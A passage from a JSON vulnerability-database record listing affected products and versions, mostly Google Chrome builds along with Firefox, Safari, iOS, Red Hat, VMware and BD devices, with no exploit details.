        "version": "23.0.1271.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1669.3"
      },
      {
        "model": "facsverse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.52"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.506.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1054"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.132"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.168"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.16"
      },
      {
        "model": "kiestra tla/wca",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1286.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.703.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.668.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.744.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.2"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.35"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.31"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "25.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.133"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1078.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.328.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.91"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.381.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.144"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1283.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.711.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.330"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.21"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.147"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.797.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.14443"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.521.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.46"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.774.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.2"
      },
      {
        "model": "watchos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.350.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.803.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.49"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.155"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.623.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.51"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.345.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.215"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1001.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.859.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1674.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.930.0"
      },
      {
        "model": "pyxis specimen collection verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.50"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.562.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.9"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "55.0.2883.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.798.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.227"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.302"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.416.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.63"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.59"
      },
      {
        "model": "gencell clic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.647.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.937.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.277.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.3"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.71"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.350.1"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.136"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.27"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.867.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.329"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.746.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.38"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.12"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.19"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1287.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.753.0"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.92"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1038.0"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.288.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.7"
      },
      {
        "model": "phoenix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "bactec fx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.496.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.294.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.728.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.7"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.824.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.706.0"
      },
      {
        "model": "lyse wash assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.453.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.35"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.933.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.585.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.557.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.80"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.549.0"
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.12.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.111"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.13"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.314.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.207"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.440.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.343.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1053.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.957.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.4"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.52"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.573.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1055"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
